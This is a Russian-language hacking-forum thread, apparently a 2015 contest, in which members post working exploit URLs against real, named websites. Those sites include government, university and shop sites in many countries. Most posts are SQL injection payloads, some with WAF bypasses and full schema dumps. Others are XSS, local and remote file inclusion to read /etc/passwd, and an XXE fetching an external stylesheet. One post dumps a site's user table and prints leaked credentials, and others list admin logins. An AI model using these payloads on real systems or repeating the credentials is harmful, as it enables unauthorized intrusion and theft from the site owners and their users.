Нашел на Рамблере XSS:
http://nova.rambler.ru/search?query=%3C%2Fa%3ELOL%3C%3E%3Cscript%3Ealert% 28111%29%3B%3C%2Fscript%3E
http://nova.rambler.ru/search?query=%3C%2Fa%3E%3C%3E%3Csvg%20onload%3D%27 prompt%28111%29%27%3E
Нашел на ukr.net
https://search.ukr.net/?q=%27%3Balert%28%2Fantichat%2F%29%3B+%2F%2F&cr=countryUA&lr=&as_qdr=&filter=&sitesearch=&safe=&related=&as_rq=&start=0
А также, Чтение локальных файлов
http://probe.bvs.br/cgi-bin/wxis1660.exe/?IsisScript=/etc/passwd
А также буду первым запостившим XML eXternal Entity
http://probe.bvs.br/transf.php?xml=news/3/1/20011213/2/body.xml&xsl=http://expdomain.esy.es/xml/my.xml
Так как про этот тип уязвимости мало известно, немного комментариев:
Уязвимость основана на трансформации xml - подключении внешней сущности. В xml файле сперва мы определяем сущность, которая например читает локальный файл
]>
И потом выводим на экран &passwd;
P.S. Извините, проверил топ-таблицу, оказывается я не первый
таблицу обновил, всем добавил. прошу проверять на повторы: повторами считаются везде, где уязвимость выкладывали.
↑ (https://antichat.live/posts/3872771/)
Нашел на Рамблере XSS:
http://nova.rambler.ru/search?query=%3C%2Fa%3ELOL%3C%3E%3Cscript%3Ealert% 28111%29%3B%3C%2Fscript%3E
http://nova.rambler.ru/search?query=%3C%2Fa%3E%3C%3E%3Csvg%20onload%3D%27 prompt%28111%29%27%3E
Нашел на ukr.net
https://search.ukr.net/?q=%27%3Balert%28%2Fantichat%2F%29%3B+%2F%2F&cr=countryUA&lr=&as_qdr=&filter=&sitesearch=&safe=&related=&as_rq=&start=0
А также, Чтение локальных файлов
http://probe.bvs.br/cgi-bin/wxis1660.exe/?IsisScript=/etc/passwd
А также буду первым запостившим XML eXternal Entity
http://probe.bvs.br/transf.php?xml=news/3/1/20011213/2/body.xml&xsl=http://expdomain.esy.es/xml/my.xml
Так как про этот тип уязвимости мало известно, немного комментариев:
Уязвимость основана на трансформации xml - подключении внешней сущности. В xml файле сперва мы определяем сущность, которая например читает локальный файл
]>
И потом выводим на экран
&passwd;
P.S. Извините, проверил топ-таблицу, оказывается я не первый
вы первый. я себе XXE написал для примера, а вам добавил. хорошая работа
Сайт: http://ww2.odu.edu
Уязвимость: LFR
Эксплоит:
http://ww2.odu.edu/ao/facultyhandbook/index.php?page=../index.php
В исходниках страницы видно PHP код. Только это мало что даёт, по крайней мере для меня.
joelblack
04.08.2015, 15:06
target: http://www.cymbeline.com
type: SQL Injection
version: 5.1.73
user: cymbeline@localhost
http://www.cymbeline.com/fr_FR/news/actualite.php5?id=-147+union+select+1,2,table_name,version(),5,6,7,8, 9,10,11,12,13,14+from+information_schema.tables+li mit+3,1+--+
target: http://igamer.su
type: SQL Injection
version: 5.1.73
user: db_user_igamer@localhost
http://igamer.su/news.php?id=-11+union+select+1,table_name,3,4,5+from+informatio n_schema.tables+limit+3,1+--+
target: http://www.kirpichi.kz
type: SQL Injection
version: 5.5.44-cll-lve
user: V_8337_KIRPICH@LOCALHOST
http://www.kirpichi.kz/?id=-7+union+select+1,2,version(),user(),5,table_name,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+info rmation_schema.tables+limit+3,1+--+&show=calc
target: http://www.qbele.com.br
type: SQL Injection
version: 5.1.73-rel14.11-log
user: site1371378569@186.202.153.159
http://www.qbele.com.br/index.php?id=-989'+union+select+1,2,3,4,5,6,version(),8,9,user() ,table_name,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,4 1,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57+ from+information_schema.tables+limit+3,1+--+&qCid=Todas
blud_niy
07.08.2015, 13:18
Site: http://www.gorodokboxing.com
Уязвимость: SQL Injection
Эксплоит:
http://www.gorodokboxing.com/material.php?id=-2'+union+select+1,user(),3,4+--+
Site: http://www.malnaditimudigere.com
Уязвимость: SQL Injection
Эксплоит:
http://www.malnaditimudigere.com/view_post.php?id=-2'+union+select+1,2,3,user(),version(),6,7,8,9+--+
Site: http://glamdring.baac.or.th
Уязвимость: SQL Injection
Эксплоит:
http://glamdring.baac.or.th/tourism/preview.php?id=-7963'+union+select+1,version(),3,4,5,6,7,8+--+
Site: http://web-sayansk.net
Уязвимость: SQL Injection
Эксплоит:
http://web-sayansk.net/view_games.php?id=-6'+union+select+1,2,3,4,user()+--+
Site: http://www.replacement-windows.com
Уязвимость: SQL Injection
Эксплоит:
http://www.replacement-windows.com/window-board/read.php?id=-9960'+union+select+1,2,3,4,version(),6,table_name, 8,9,10,user(),12,13,14,15,16,17,18,19+from+informa tion_schema.tables+limit+1,1+--+
Site: http://www.bellebuddy.com
Уязвимость: SQL Injection
Эксплоит:
http://www.bellebuddy.com/viewproduct.php?id=-311'+union+select+1,version(),user(),4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22+--+
Site: http://www.babilon-nyelvstudio.hu
Уязвимость: SQL Injection
Эксплоит:
http://www.babilon-nyelvstudio.hu/page.php?id=-305'+union+select+1,2,3,4,5,6,version(),user(),tab le_name,10,11,12,13,14,15,16+from+information_sche ma.tables+limit+3,1+--+
blud_niy
12.08.2015, 15:14
подскажите... а что, конкурс уже завершился?
↑ (https://antichat.live/posts/3879276/)
подскажите... а что, конкурс уже завершился?
нет, добавляю по возможности
comstream
13.08.2015, 16:19
Site: cc-comics.pl
Уязвимость: Local File Inclusion
Эксплоит:
http://cc-comics.pl/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=/etc/passwd
Site: www.ctpart.com (http://www.ctpart.com)
Уязвимость: Local File Inclusion
http://www.ctpart.com/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=/etc/passwd
comstream
20.08.2015, 19:15
Сайт : http://astana.gov.kz
Уязвимость: XSS
Эксплоит: http://astana.gov.kz/en/resetting/request
В поле
Username or email address:
Post запрос: alert(document.cookie);
↑ (https://antichat.live/posts/3876251/)
target: http://www.cymbeline.com
type: SQL Injection
version: 5.1.73
user: cymbeline@localhost
http://www.cymbeline.com/fr_FR/news/actualite.php5?id=-147+union+select+1,2,table_name,version(),5,6,7,8, 9,10,11,12,13,14+from+information_schema.tables+li mit+3,1+--+
target: http://igamer.su
type: SQL Injection
version: 5.1.73
user: db_user_igamer@localhost
http://igamer.su/news.php?id=-11+union+select+1,table_name,3,4,5+from+informatio n_schema.tables+limit+3,1+--+
target: http://www.kirpichi.kz
type: SQL Injection
version: 5.5.44-cll-lve
user: V_8337_KIRPICH@LOCALHOST
http://www.kirpichi.kz/?id=-7+union+select+1,2,version(),user(),5,table_name,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+info rmation_schema.tables+limit+3,1+--+&show=calc
target: http://www.qbele.com.br
type: SQL Injection
version: 5.1.73-rel14.11-log
user: site1371378569@186.202.153.159
http://www.qbele.com.br/index.php?id=-989'+union+select+1,2,3,4,5,6,version(),8,9,user() ,table_name,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,4 1,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57+ from+information_schema.tables+limit+3,1+--+&qCid=Todas
↑ (https://antichat.live/posts/3877429/)
Site:
http://www.gorodokboxing.com
Уязвимость: SQL Injection
Эксплоит:
http://www.gorodokboxing.com/material.php?id=-2'+union+select+1,user(),3,4+--+
Site:
http://www.malnaditimudigere.com
Уязвимость: SQL Injection
Эксплоит:
http://www.malnaditimudigere.com/view_post.php?id=-2'+union+select+1,2,3,user(),version(),6,7,8,9+--+
Site:
http://glamdring.baac.or.th
Уязвимость: SQL Injection
Эксплоит:
http://glamdring.baac.or.th/tourism/preview.php?id=-7963'+union+select+1,version(),3,4,5,6,7,8+--+
Site:
http://web-sayansk.net
Уязвимость: SQL Injection
Эксплоит:
http://web-sayansk.net/view_games.php?id=-6'+union+select+1,2,3,4,user()+--+
Site:
http://www.replacement-windows.com
Уязвимость: SQL Injection
Эксплоит:
http://www.replacement-windows.com/window-board/read.php?id=-9960'+union+select+1,2,3,4,version(),6,table_name, 8,9,10,user(),12,13,14,15,16,17,18,19+from+informa tion_schema.tables+limit+1,1+--+
Site:
http://www.bellebuddy.com
Уязвимость: SQL Injection
Эксплоит:
http://www.bellebuddy.com/viewproduct.php?id=-311'+union+select+1,version(),user(),4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22+--+
Site:
http://www.babilon-nyelvstudio.hu
Уязвимость: SQL Injection
Эксплоит:
http://www.babilon-nyelvstudio.hu/page.php?id=-305'+union+select+1,2,3,4,5,6,version(),user(),tab le_name,10,11,12,13,14,15,16+from+information_sche ma.tables+limit+3,1+--+
↑ (https://antichat.live/posts/3879649/)
Site:
cc-comics.pl
Уязвимость:
Local File Inclusion
Эксплоит:
http://cc-comics.pl/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=/etc/passwd
Site:
www.ctpart.com (http://www.ctpart.com)
Уязвимость: Local File Inclusion
http://www.ctpart.com/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=/etc/passwd
↑ (https://antichat.live/posts/3882516/)
Сайт :
http://astana.gov.kz
Уязвимость: XSS
Эксплоит:
http://astana.gov.kz/en/resetting/request
В поле
Username or email address:
Post запрос: alert(document.cookie);
добавил
comstream
10.09.2015, 12:11
Сайт : http://mod.gov.kz (http://astana.gov.kz/)
Уязвимость: XSS
Эксплоит:
mod.gov.kz/kaz/akciya_k_70yu_letiyu/foto_akciya'"()%26%25alert(document.cookie)/
Metal-Core
10.09.2015, 23:54
Сайт : http://4rpg.net/buy2.php?game=lineage2classic&server=Shillien
Уязвимость: XSS
Эксплоит: http://4rpg.net/buy3.php
Поля
"E-mail", "Ник в игре", "Комментарии" :
Post запрос: 'alert('satanic')
Strannik1236
11.09.2015, 13:41
Сколько уязвимостей надо найти и что получит победитель?
↑ (https://antichat.live/posts/3890102/)
Сколько уязвимостей надо найти и что получит победитель?
перечитайте первое сообщение
blud_niy
13.09.2015, 08:34
Site: thewhole9.com
Уязвимость: SQL Injection
Эксплоит:
http://www.thewhole9.com/event_read.php?id=-2594'+union+select+1,2,version(),4,5,6,7,8,9,user( ),table_name,12,13,14,15,16,17+from+information_sc hema.tables+limit+3,1+--+
Site: domainefoivos.com
Уязвимость: SQL Injection
Эксплоит:
http://www.domainefoivos.com/news-read.php?id=-10'+union+select+1,version(),3,4,5,table_name,7,8, 9,10+from+information_schema.tables+limit+3,1+--+
Site: zupa.pregrada.hr
Уязвимость: SQL Injection
Эксплоит:
http://www.zupa.pregrada.hr/story.php?id=-276'+union+select+1,version(),3,4,user(),6+--+
Site: obfzgalanta.sk
Уязвимость: SQL Injection
Эксплоит:
http://obfzgalanta.sk/uniweb/article.php?id=-2719'+union+select+1,version(),3,table_name,user() +from+information_schema.tables+limit+3,1+--+
Site: obfztopolcany.sk
Уязвимость: SQL Injection
Эксплоит:
http://www.obfztopolcany.sk/uniweb/article.php?id=-3178'+union+select+1,version(),3,table_name,user() +from+information_schema.tables+limit+3,1+--+
Site: letzzep.com
Уязвимость: SQL Injection
Эксплоит:
http://www.letzzep.com/reviewpop.php?id=-30'+union+select+1,table_name,3,4,5,user(),version (),8+from+information_schema.tables+limit+3,1+--+
Site: agrovolyn.com
Уязвимость: SQL Injection
Эксплоит:
http://agrovolyn.com/news.php?id=-657'+union+select+1,version(),table_name,4,5,6,use r()+from+information_schema.tables+limit+3,1+--+
Site: siempreenplay.com
Уязвимость: SQL Injection
Эксплоит:
http://www.siempreenplay.com/EstudiosCientificos_post.php?id=-16'+union+select+1,2,3,4,5,table_name,7,8,9,10+fro m+information_schema.tables+limit+3,1+--+
Site: kmbajwa.com
Уязвимость: SQL Injection
Эксплоит:
http://kmbajwa.com/page.php?id=-9'+union+select+1,version(),table_name+from+inform ation_schema.tables+limit+4,1+--+
Site: bhajanawali.com
Уязвимость: SQL Injection
Эксплоит:
http://www.bhajanawali.com/reading-den/read.php?id=-10'+union+select+1,table_name,3,4+from+information _schema.tables+limit+4,1+--+
Всем привет!
В ручную пока не особо получается раскручивать, посему не вините))
http://www.24open-casino.com//index.php?act=games&hall=playtech&p= - интернет-казино, на сайте вообще куча косяков с SQLi и XSS, база элементарно вытаскивается, пароли в MD5, куча личной инфы по пользователям.
http://www.fortunataptr.pl/scripts/runner.php?GA= (http://www.fortunataptr.pl/scripts/runner.php?GA=%Inject_Here%btc) - мыла с акками, пароли в MD5 (SQLi);
http://www.frisbyracetire.net/showproducts.php?catid=2&subcatid= (http://www.frisbyracetire.net/showproducts.php?catid=2&subcatid=%Inject_Here%7) - пароли без шифрования (SQLi);
http://www.yickyak.net/categories.php?catid= (http://www.yickyak.net/categories.php?catid=%Inject_Here%4) - пароли в MD5 (SQLi);
http://www.beavercreekrental.net/RentalCategoryDetails.asp?category_id= (http://www.beavercreekrental.net/RentalCategoryDetails.asp?category_id=%Inject_Here %26) - пароли без шифрования (SQLi).
Сайт: www.metal-rules.com (http://www.metal-rules.com)
Уязвимость: SQL Injection
Эксплоит:
http://www.metal-rules.com/polls/index.php?id=-1%27+UNION+SELECT+1,user(),3,version()+--+
Заодно прошу подсказки. Это я упорот или там нет таблицы с пользователями?
Ну-с попробуем хД
Сайт: przedszkolefelicjanek.pl
Уязвимость: SQLi
Эксплоит:
https://przedszkolefelicjanek.pl/index.php?action=2%20union%20select%20@@Version,2% 20--
Сайт: krapik.pl
Уязвимость: SQLi
Эксплоит:
http://www.krapik.pl/index.php?action=2&id=30%27%20union%20select%201,2,3,4,5,6,version%28 %29,user%28%29,9,10,11,12,13,14,15,16,17,18,19,20% 20%20--%20%27and%201=1
Сайт: dobrawola.org.pl
Уязвимость: SQLi
Эксплоит:
http://www.dobrawola.org.pl/index.php?action=2%20union%20select%201,version%28 %29,3,user%28%29,5,6,7,8
Сайт: izba-lekarska.org.pl
Уязвимость: SQLi
Эксплоит:
http://www.izba-lekarska.org.pl/stara_strona/index.php?mid=1&sid=54;select+version%28%29::int--
Сайт: inter-system.com.pl
Уязвимость: SQLi
Эксплоит:
http://www.inter-system.com.pl/content.php?id=4;select+version%28%29::int--&ids=362
Сайт: przygodywoblokach.pl
Уязвимость: SQLi
Эксплоит:
http://www.przygodywoblokach.pl/content.php?id=23;select+version%28%29::int--&ids=362&ids=18
Сайт: fundacjafilmowa.pl
Уязвимость: SQLi
Эксплоит:
http://www.fundacjafilmowa.pl/print.php?id=142;select+version%28%29::int--
Сайт: wk-nieruchomosci.pl
Уязвимость: SQLi
Эксплоит:
http://wk-nieruchomosci.pl/print.php?id=6%20union%20select%201,2,3,version%28 %29,5,user%28%29,7,8,9,10,11,12,13,14,15,16,17,18
Сайт: gamepat.de
Уязвимость: RFI
Эксплоит:
http://gamepat.de/portfolio/index.php?link=data%3A%2F%2Ftext%2Fplain%3Bbase64% 2CPD9waHAgcGhwaW5mbygpOyA%2FPg%20%20
Сайт: everybyte.nl
Уязвимость: IFRAME Injection
Эксплоит:
http://www.everybyte.nl/index.php?x=http://google.com
Сайт: dzienziemi.org.pl
Уязвимость: LFI
Эксплоит:
http://www.dzienziemi.org.pl/2015/index.php?m=hi&pm=../../../../../../etc/passwd
Сайт: festus.pl
Уязвимость: XSS (поганенькая, но в торе отработала)
Эксплоит:
http://www.festus.pl/search.htm?qt=%3Cscript%3Ealert%28%29;%3C/script%3E&szukaj.x=12&szukaj.y=10&lang=pl
Сайт: endividado.com.br
Уязвимость: SQLi
Эксплоит (с обходом WAF):
http://www.endividado.com.br/faq_det.php?id=10+/*!union*/+select+1,@@tmpdir,database/*!(*/),current_user,@@hostname,6,7+--+
UPD DIOS
http://www.cardigan.ltd.uk/exhibitions-index.php?id=11' /*!50000union*/ select 1,2,/*!50000concat*/((select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.columns)where(table_schema!=0x 696e666f726d6174696f6e5f736368656d61) and (@a)in (@a:=/*!50000concat*/(@a,0x3c6c693e,table_schema,0x203a3a20,table_name, 0x203a3a20,column_name,0x3c62723e))))a)),4,5,6,7,8 ,9,10,11,12,13,14--+
Сайт: www2.ufpel.edu.br
Уязвимость: AFR или LFI (как правильно, подскажите?)
Эксплоит:
http://www2.ufpel.edu.br/alunos/index.php?link=php://filter/convert.base64-encode/resource=index
Сайт: http://igrek.amzp.pl
Уязвимость: SQLi
Эксплоит:
http://igrek.amzp.pl/details.php?id=-11768531+UNION+ALL+SELECT+CONCAT_WS(0x203a20,USER( ),DATABASE(),VERSION()),2,3,4,5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29, 30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 ,47,48,49,50,51,52--+
Сайт: humweb.ucsc.edu
Уязвимость: SQLi
Эксплоит:
http://humweb.ucsc.edu/mediterraneanseminar/news/index.php?id=-236'+UNION+ALL+SELECT+1,2,(Select+export_set(5,@:= 0,(select+count(*)from(information_schema.columns) where@:=export_set(5,export_set(5,@,table_name,0x3 c6c693e,2),column_name,0xa3a,2)),@,2)),4,5,6 --+
Сайт: http://nightgallery.ca
Уязвимость: SQLi
Эксплоит:
http://nightgallery.ca/event.php?id=-91+UNION+ALL+SELECT+1,export_set(5,@:=0,(select+co unt(*)/*!50000from*/+/*!50000information_schema*/.columns+where@:=export_set(5,export_set(5,@,0x3c6 c693e,/*!50000column_name*/,2),0x3a3a,/*!50000table_name*/,2)),@,2),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29 --+
Сайт: http://reviewedporn.com
Уязвимость: XSS (там их куча)
Эксплоит:
http://reviewedporn.com/cat/gangbang?orderby=toprated&page=2">prompt(909661)
Сайт: http://www.guessthespot.com
Уязвимость: SQLi
Эксплоит:
http://www.guessthespot.com/index.php?cat_id=-3%20+UNION+ALL+SELECT+1,2,3,export_set%285,@:=0,%2 8select+count%28*%29/*!50000from*/+/*!50000information_schema*/.columns+where@:=export_set%285,export_set%285,@,0 x3c6c693e,/*!50000column_name*/,2%29,0x3a3a,/*!50000table_name*/,2%29%29,@,2%29,5,6,7,8%20--
Сайт: http://www.rotawheels.com
Уязвимость: SQLi
Эксплоит:
http://www.rotawheels.com/news.php?id=5 +UNION+ALL+SELECT+1,2,(/*!50000select*/+concat+(@:=0,(/*!50000select*/+count(*) from+/*!50000information_schema.tables*/+WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736 368656d61)AND@:=concat+(@,0x3c62723e,/*!50000table_name*/)),@)),4,5--
Сайт: http://www.cese.utulsa.edu
Уязвимость: SQLi
Эксплоит:
http://www.cese.utulsa.edu/programdetail.php?ID=-127 +UNION+ALL+SELECT+1,2,3,4,5,CONCAT_WS(0x203a20,USE R(),DATABASE(),VERSION()),7,8,9 --
Сайт: http://www.freepoc.org
Уязвимость: SQLi
Эксплоит:
http://www.freepoc.org/viewapp.php?id=32 +UNION+ALL+SELECT+1,2,3,4,5,6,7,(Select+export_set (5,@:=0,(select+count(*)from(information_schema.co lumns)where@:=export_set(5,export_set(5,@,table_na me,0x3c6c693e,2),column_name,0xa3a,2)),@,2))--
Сайт: http://www.clanwilliam.info
Уязвимость: SQLi
Эксплоит:
http://www.clanwilliam.info/index.php?id=-1 +UNION+ALL+SELECT+1,(select(select+concat(@:=0xa7, (select+count(*)from(information_schema.columns)wh ere(@:=concat(@,0x3c6c693e,table_name,0x3a,column_ name))),@))),3,4,5,6,7 --
antikonstantin
10.10.2015, 22:33
Сайт: http://www.sunmedi.co.kr/
Уязвимость: SQLi
Эксплоит:
http://www.sunmedi.co.kr/EOrder/index.asp?ShopID=nunbo0808' or 1=[t] and '1'='1
Сайт: http://www.wzxsc.net/
Уязвимость: SQLi
Эксплоит:
http://www.wzxsc.net/category.php?catid=999999.9 union all select 1,[t],3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
Сайт: http://skywatcher.com/
Уязвимость: SQLi
Эксплоит:
http://skywatcher.com/downloads.php?cat=999999.9 union all select 1,2,3,[t],5,6,7,8,9,10,11,12,13,14,15,16,17
Сайт: http://www.terraforza.nl/
Уязвимость: SQLi
Эксплоит:
http://www.terraforza.nl/index.php?catid=79' and [t] and '1'='1
Сайт: http://www.dgn.co.th/
Уязвимость: SQLi
Эксплоит:
http://www.dgn.co.th/product-view.php?product_ID=999999.9' union all select 1,[t],3,4 and '0'='0
Сайт: http://www.ampak.com.tw/
Уязвимость: SQLi
Эксплоит:
http://www.ampak.com.tw/product_list.php?cid=[t]
↑ (https://antichat.live/posts/3899303/)
Сайт: www2.ufpel.edu.br
Уязвимость: LFR или AFR? (подскажите как правильно?)
Эксплоит:
http://www2.ufpel.edu.br/alunos/index.php?link=php://filter/convert.base64-encode/resource=index
все-таки тут AFR через RFI. всем, кто писал, добавил, если что-то в таблице не так, пишите в лс. AlexG проходит
↑ (https://antichat.live/posts/3900927/)
http://skywatcher.com/downloads.php?cat=999999.9
union all select 1,2,3,[t],5,6,7,8,9,10,11,12,13,14,15,16,17
Привет!
Писал вчера ответ, но его кто-то съел))
Вкратце: заинтересовал этот сайт, ибо люблю телескопы)) Итак, имеем хэш SQL5 (быстрых методов его вскрытия не знаю) и непонятный admin:123
http://skywatcher.com/downloads.php?cat=999999.9 union all select 1,2,(SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(skywatcher.users)WHERE(@x)IN(@x:= CONCAT(0x20,@x,user_login,0x3a,user_password,0x3c6 2723e))))x),4,5,6,7,8,9,10,11,12,13,14,15,16,17 --
Админку не нашел известными мне способами, но есть вот это:
http://skywatcher.com/_db_backups/.htaccess
где видим строку "AuthUserFile /home/content/s/k/y/html/stats/.statspwd"
в котором, соответственно, "skyw1042:RMyP86leOB18k".
Дальше вот затупил, что делать.
↑ (https://antichat.live/posts/3901475/)
Привет!
Писал вчера ответ, но его кто-то съел))
Вкратце: заинтересовал этот сайт, ибо люблю телескопы)) Итак, имеем хэш SQL5 (быстрых методов его вскрытия не знаю) и непонятный admin:123
http://skywatcher.com/downloads.php?cat=999999.9 union all select 1,2,(SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(skywatcher.users)WHERE(@x)IN(@x:= CONCAT(0x20,@x,user_login,0x3a,user_password,0x3c6 2723e))))x),4,5,6,7,8,9,10,11,12,13,14,15,16,17 --
Админку не нашел известными мне способами, но есть вот это:
http://skywatcher.com/_db_backups/.htaccess
где видим строку "AuthUserFile /home/content/s/k/y/html/stats/.statspwd"
в котором, соответственно, "skyw1042:RMyP86leOB18k".
Дальше вот затупил, что делать.
здесь не вопросы по уязвимостям. пример оформления сообщения в 1 посте
↑ (https://antichat.live/posts/3901475/)
Привет!
Писал вчера ответ, но его кто-то съел))
Вкратце: заинтересовал этот сайт, ибо люблю телескопы)) Итак, имеем хэш SQL5 (быстрых методов его вскрытия не знаю) и непонятный admin:123
http://skywatcher.com/downloads.php?cat=999999.9 union all select 1,2,(SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(skywatcher.users)WHERE(@x)IN(@x:= CONCAT(0x20,@x,user_login,0x3a,user_password,0x3c6 2723e))))x),4,5,6,7,8,9,10,11,12,13,14,15,16,17 --
Админку не нашел известными мне способами, но есть вот это:
http://skywatcher.com/_db_backups/.htaccess
где видим строку "AuthUserFile /home/content/s/k/y/html/stats/.statspwd"
в котором, соответственно, "skyw1042:RMyP86leOB18k".
Дальше вот затупил, что делать.
http://skywatcher.com/sw_admin/login.php
↑ (https://antichat.live/posts/3901527/)
здесь не вопросы по уязвимостям. пример оформления сообщения в 1 посте
Согласен на 100%. Я не обсуждал уязвимость, а старался ее расширить. Постараюсь не писать больше в этой теме.
grimnir: Вы, как всегда, в ударе)) Если не секрет, ЧЕМ (я про админку)??? я опробовал все, что только можно))
↑ (https://antichat.live/posts/3901693/)
Согласен на 100%. Я не обсуждал уязвимость, а старался ее расширить. Постараюсь не писать больше в этой теме.
grimnir: Вы, как всегда, в ударе)) Если не секрет, ЧЕМ (я про админку)??? я опробовал все, что только можно))
Не секрет, привычка проверять на индекс-файл гит http://skywatcher.com/.git/index тут вся структура сайта
antikonstantin
17.10.2015, 23:01
Сайт: http://www.calidus.ro/ (http://www.ampak.com.tw/)
Уязвимость: SQLi
Эксплоит:
http://www.calidus.ro/en/news.php?id=999999.9 union all select 1,[t],3,4
Сайт: http://www.protek.fr (http://www.ampak.com.tw/)
Уязвимость: SQLi
Эксплоит:
http://www.protek.fr/achat/index.php?catid=999999.9 union all select 1,[t]--
Сайт: http://www.parskado.com
Уязвимость: SQLi
Эксплоит:
http://www.parskado.com/category.php?CATID=999999.9 union all select [t],2
Сайт: http://www.worldofbirds.com/
Уязвимость: SQLi
Эксплоит:
http://www.worldofbirds.com/products.php?prodID=999999.9 union all select [t],2,3
Сайт: http://www.trinews.at/
Уязвимость: SQLi
Эксплоит:
http://www.trinews.at/index.asp?CID=[t]
Сайт: http://www.gotmachinery.com/
Уязвимость: SQLi
Эксплоит:
http://www.gotmachinery.com/gmbrowsetype.php?subcat_id=273' and [t] and '1'='1&lang_id=
Сайт: http://www.metalmate.in/
Уязвимость: SQLi
Эксплоит:
http://www.metalmate.in/product_detail.php?subcat_id=1' and [t] and '1'='1&cat_id=1&subsubcat_id=5
Сайт: http://bazarvidal.com.br/
Уязвимость: SQLi
Эксплоит:
http://bazarvidal.com.br/detcat.cfm?id=[t]
Сайт: http://www.fertilita.org/
Уязвимость: SQLi
Эксплоит:
http://www.fertilita.org/index.asp?CatID=999999.9 union all select 1,[t],3,4,5,6,7,8,9
Сайт: http://www.phcqa.org/
Уязвимость: SQLi
Эксплоит:
http://www.phcqa.org/measures/category.php?category_id=[t]
Сайт: http://www.jeannius.com/
Уязвимость: SQLi
Эксплоит:
http://www.jeannius.com/websys/store_mainpage.php?cat_id=999999.9 union all select 1,[t],3,4&subcat_id=46
Сайт: http://www.pad10.com/
Уязвимость: SQLi
Эксплоит:
http://www.pad10.com/pad10/project_listing_category.php?subcat_id=11' and [t] and '1'='1
Сайт: http://www.foldermate.com/
Уязвимость: SQLi
Эксплоит:
http://www.foldermate.com/product_list.php?lang=en&id=F4C2DE0E-8D10-421E-B4EF-A8D67B7836E9999999.9' union all select 1,2,3,4,5,6,7,8,9,10,11,[t],13,14,15,16 and '0'='0
Сайт: http://www.kingscommodities.com/
Уязвимость: SQLi
Эксплоит:
http://www.kingscommodities.com/products.php?prodid=999999.9 union all select 1,[t],3,4,5,6
Сайт: http://www.architrend.com.au/
Уязвимость: SQLi
Эксплоит:
http://www.architrend.com.au/product-details.php? (http://www.architrend.com.au/product-details.php?category_id=46&product_id=706)
category_id=46&product_id=706' and [t] and '1'='1
Сайт: http://www.bellmtcs.com/
Уязвимость: SQLi
Эксплоит:
http://www.bellmtcs.com/store/index.php?cid=121 or 1=[t] and 1=1
Сайт: http://office.altakadom.com/
Уязвимость: SQLi
Эксплоит:
http://office.altakadom.com/products.php?subcat_id=130' and [t] and '1'='1
admin indi@2011
Сайт: http://www.sb2online.com/
Уязвимость: SQLi
Эксплоит:
http://www.sb2online.com/view_item.php?prodid=999999.9 union all select 1,2,[t],4
Сайт: http://old.harbourfood.com/
Уязвимость: SQLi
Эксплоит:
http://old.harbourfood.com/products/default.php?cat=Equipment&cls=&subcls=&vendor=[t]
Сайт: http://www.ptsrentals.com/
Уязвимость: SQLi
Эксплоит:
http://www.ptsrentals.com/catalog.php?c=999999.9 union all select [t],2,3,4,5,6,7,8,9
Сайт: http://www.savillsguardian.com.hk/
Уязвимость: SQLi
Эксплоит:
http://www.savillsguardian.com.hk/html/customer/index.asp?id=1594' or 1=[t] and '1'='1
Сайт: http://www.arroxx.com/
Уязвимость: SQLi
Эксплоит:
http://www.arroxx.com/catalogue.php?pID=[t]
Сайт: http://michiganlakeproducts.com/
Уязвимость: SQLi
Эксплоит:
http://michiganlakeproducts.com/productpage.php?PID=[t]
Сайт: http://www.a3com.net/
Уязвимость: SQLi
Эксплоит:
http://www.a3com.net/product-list.php?cat_id=[t]
admina3com a3com@emirates.net.ae (mailto:a3com@emirates.net.ae) admin
Сайт: http://www.mslibrary.org/
Уязвимость: SQLi
Эксплоит:
http://www.mslibrary.org/mountjoy/cwp/browse.asp?c=43915&a=[t]&BMDRN=2000&BCOB=0
Сайт: http://rdmpro.com/
Уязвимость: SQLi
Эксплоит:
http://rdmpro.com/product-details.php?pid=999999.9 union all select 1,2,3,4,5,6,7,8,9,10,11,[t],13,14,15,16,17
Сайт: http://www.estheticsglobal.com/
Уязвимость: SQLi
Эксплоит:
http://www.estheticsglobal.com/cat.php?id=999999.9 union all select 1,2,3,4,5,6,[t],8,9,10
Сайт: http://overlandindustries.com/
Уязвимость: SQLi
Эксплоит:
http://overlandindustries.com/productDetail.php?productID=999999.9 union all select 1,2,[t],4,5,6
Сайт: http://www.casacrystal.com/
Уязвимость: SQLi
Эксплоит:
http://www.casacrystal.com/detail.php?cid=[t]&id=3
Сайт: http://www.brightonretail.com/
Уязвимость: SQLi
Эксплоит:
http://www.brightonretail.com/calendar/monthly_view.php?cid=999999.9 union all select 1,2,3,4,5,[t],7,8--&catid=&m=10&w=5&y=2015&s=
Сайт: http://scclbd.com/
Уязвимость: SQLi
Эксплоит:
http://scclbd.com/viewproduct.php?prodid=999999.9 union all select 1,2,3,4,5,[t],7,8
Всем привет
Прошу не судить строго - я вообще только начинаю читать мануалы
мой первый найденный SQL Inj (искал в ручную, перебирая сайты из выдачи Google)
http://www.illaricegrill.it/readnews.php?id=22+union+select+1,version(),databa se(),4,user()
5.5.38-35.2-log
icsa1_1
mi-_a-nics
